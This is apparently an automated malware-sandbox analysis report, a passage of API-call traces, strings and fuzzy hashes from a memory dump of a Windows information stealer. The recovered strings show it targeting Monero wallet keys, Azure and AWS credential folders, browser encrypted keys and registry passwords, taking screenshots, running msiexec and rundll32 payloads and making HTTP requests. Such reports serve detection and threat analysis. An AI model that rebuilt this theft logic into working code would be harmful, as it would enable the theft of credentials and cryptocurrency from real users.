                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00DEC680,00000000,?,00FD144C,00000000,?,?), ref: 00FBCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FBCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00FBCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FBCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FBCAD9
                              • StrStrA.SHLWAPI(?,00DEC698,00FD0B52), ref: 00FBCAF7
                              • StrStrA.SHLWAPI(00000000,00DEC758), ref: 00FBCB1E
                              • StrStrA.SHLWAPI(?,00DECDB0,00000000,?,00FD1458,00000000,?,00000000,00000000,?,00DE90E8,00000000,?,00FD1454,00000000,?), ref: 00FBCCA2
                              • StrStrA.SHLWAPI(00000000,00DECD70), ref: 00FBCCB9
                                • Part of subcall function 00FBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                                • Part of subcall function 00FBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                              • StrStrA.SHLWAPI(?,00DECD70,00000000,?,00FD145C,00000000,?,00000000,00DE8FC8), ref: 00FBCD5A
                              • StrStrA.SHLWAPI(00000000,00DE8E38), ref: 00FBCD71
                                • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                                • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                                • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                              • lstrlen.KERNEL32(00000000), ref: 00FBCE44
                              • CloseHandle.KERNEL32(00000000), ref: 00FBCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 00af4305355649fb170416991fa31481f2ca5968c7411b3b3dfb3755b3eb232a
                              • Instruction ID: 01c0b1c4cc650ddcdf04610e151e5d69a30fb269f0856e1ee3e655f93b72e9e5
                              • Opcode Fuzzy Hash: 00af4305355649fb170416991fa31481f2ca5968c7411b3b3dfb3755b3eb232a
                              • Instruction Fuzzy Hash: 21E1EA7190010DABDB18EBA0ED96FEEB778AF14304F40416DF10667191EF387A8ADB65
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • RegOpenKeyExA.ADVAPI32(00000000,00DEAAA8,00000000,00020019,00000000,00FD05B6), ref: 00FC83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                              • wsprintfA.USER32 ref: 00FC8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                              • Instruction ID: 2d0839f1ac47048e90e41959b299d8701b6f9a1f6ef9b0de5b88adbc9148c2cd
                              • Opcode Fuzzy Hash: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                              • Instruction Fuzzy Hash: 4981297191011DABDB28DB50DD96FEAB7B8BF08704F00829DE10AA7180DF756E86DF90
                              APIs
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00FC4DCD
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                                • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00FC4E59
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                                • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                                • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FC4EE5
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49B0
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD08D2), ref: 00FC49C5
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49E2
                                • Part of subcall function 00FC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FC4A1E
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00DEE9F8), ref: 00FC4A4A
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FF8), ref: 00FC4A5C
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A70
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FFC), ref: 00FC4A82
                                • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A96
                                • Part of subcall function 00FC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FC4AAC
                                • Part of subcall function 00FC4910: DeleteFileA.KERNEL32(?), ref: 00FC4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 2bf25a91b5e3e1ce9392a953f75ac209d515d51985090d533d92e057e3e0da3c
                              • Instruction ID: f4ea907e1507a88e9f5b0c447088ffbbbe6a6a6aae349f495be3c230cacd900b
                              • Opcode Fuzzy Hash: 2bf25a91b5e3e1ce9392a953f75ac209d515d51985090d533d92e057e3e0da3c
                              • Instruction Fuzzy Hash: 1941EB7994020867C764F770ED5BFED3738AB64700F0444587249961C1EEB8ABC9EB92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FC906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                              • Instruction ID: 00f5102f3e764b9dbdea188c04960e34b79214f6fb693fecbd2e699a7174e1bc
                              • Opcode Fuzzy Hash: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                              • Instruction Fuzzy Hash: 2D711075900209ABCB18DFE4ED89FEDB7B8BF48700F14811CF519A7284DB79A945DB60
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00FC34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                              • Instruction ID: 375b9023a76a356227f38f3f06603f758557a65a40eca00d8c1783ade78a543a
                              • Opcode Fuzzy Hash: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                              • Instruction Fuzzy Hash: A312FB7180010D9BDB19EBA0DE93FEDB738AF14304F54415DE50666191EF387B4AEBA2
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                                • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6303
                                • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                                • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB6385
                                • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                                • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                              • lstrlen.KERNEL32(00000000), ref: 00FC532F
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                              • lstrlen.KERNEL32(00000000), ref: 00FC5383
                              • lstrlen.KERNEL32(00000000), ref: 00FC53AE
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 7f2a140c8daa57cfa41021b626bcc2ad1bc507e623a454ba8e8bb4c5336e54c7
                              • Instruction ID: 916985af4f851f57bad840034065e2fad83108bb4a1068ed6c4fdeb4a3c9de49
                              • Opcode Fuzzy Hash: 7f2a140c8daa57cfa41021b626bcc2ad1bc507e623a454ba8e8bb4c5336e54c7
                              • Instruction Fuzzy Hash: 7051B63091014AABCB18EF64DE97FED7779AF50304F50402CE40A5A592EF387A46EB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: e82294908e89de7cc2de71234cf7d88b614ab8dca0f3e74afe3473533aeaa9ff
                              • Instruction ID: d2313abcbd82d37457e8b96582c3919d40ef69876f4e332392f42e1d5430c5cc
                              • Opcode Fuzzy Hash: e82294908e89de7cc2de71234cf7d88b614ab8dca0f3e74afe3473533aeaa9ff
                              • Instruction Fuzzy Hash: 1FC195B590011E9BCB18EF60DD8AFEA7378BF54304F00459CF11EA7181EA78AA95DF91
                              APIs
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC42EC
                              • lstrcat.KERNEL32(?,00DEE028), ref: 00FC430B
                              • lstrcat.KERNEL32(?,?), ref: 00FC431F
                              • lstrcat.KERNEL32(?,00DEDF80), ref: 00FC4333
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                                • Part of subcall function 00FB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC93C0: GlobalAlloc.KERNEL32(00000000,00FC43DD,00FC43DD), ref: 00FC93D3
                              • StrStrA.SHLWAPI(?,00DEE1C0), ref: 00FC43F3
                              • GlobalFree.KERNEL32(?), ref: 00FC4512
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                                • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                                • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC44A3
                              • StrCmpCA.SHLWAPI(?,00FD08D1), ref: 00FC44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FC44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00FC44E5
                              • lstrcat.KERNEL32(00000000,00FD0FB8), ref: 00FC44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8ff9fe050b2d506af0dd39db714c375eba17191fd9819b7c37d33911ceeb3399
                              • Instruction ID: 4907c561ce0da1e35de1b0cfd3b0d7698929122674a4df419e9315d7da7df9c7
                              • Opcode Fuzzy Hash: 8ff9fe050b2d506af0dd39db714c375eba17191fd9819b7c37d33911ceeb3399
                              • Instruction Fuzzy Hash: 42719672900209ABCB14EBA0DD8AFEE7779BF48300F04459CF61997181DA78EB45DF91
                              APIs
                                • Part of subcall function 00FB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                                • Part of subcall function 00FB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                                • Part of subcall function 00FB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                                • Part of subcall function 00FB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                                • Part of subcall function 00FB12A0: RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00FB134F
                              • lstrlen.KERNEL32(?), ref: 00FB135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00FB1377
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FB1465
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00FB14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: ad2eeb8f93a7e587542b84b912d6fe82616896c8632e6107816001cc863e58ed
                              • Instruction ID: 499ee8814e70509b2a5940584f15635a72e64ca4d3d89a95198321dce63f5a38
                              • Opcode Fuzzy Hash: ad2eeb8f93a7e587542b84b912d6fe82616896c8632e6107816001cc863e58ed
                              • Instruction Fuzzy Hash: BB5111B195011D97CB29EB60DD97FED733CAF54304F4041ACB60AA2081EE786B85DFA6
                              APIs
                                • Part of subcall function 00FB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                                • Part of subcall function 00FB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                                • Part of subcall function 00FB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                                • Part of subcall function 00FB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                                • Part of subcall function 00FB72D0: HeapFree.KERNEL32(00000000), ref: 00FB7459
                              • lstrcat.KERNEL32(00000000,00FD17FC), ref: 00FB7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FB7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00FB765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FB768F
                              • lstrcat.KERNEL32(00000000,00FD1804), ref: 00FB76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00FB76D3
                              • lstrcat.KERNEL32(00000000,00FD1808), ref: 00FB76ED
                              • task.LIBCPMTD ref: 00FB76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                              • Instruction ID: f0b4de491e221acd154f78deed544f5998dc977d2c433e1d6aa6f217fe8e3746
                              • Opcode Fuzzy Hash: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                              • Instruction Fuzzy Hash: D7314DB2900209DBCB18EBA5EC85DEE7779BF84301F14412CE116A7284DA38A986EF51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00DEDF20,00000000,?,00FD0E2C,00000000,?,00000000), ref: 00FC8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FC8158
                              • __aulldiv.LIBCMT ref: 00FC8172
                              • __aulldiv.LIBCMT ref: 00FC8180
                              • wsprintfA.USER32 ref: 00FC81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
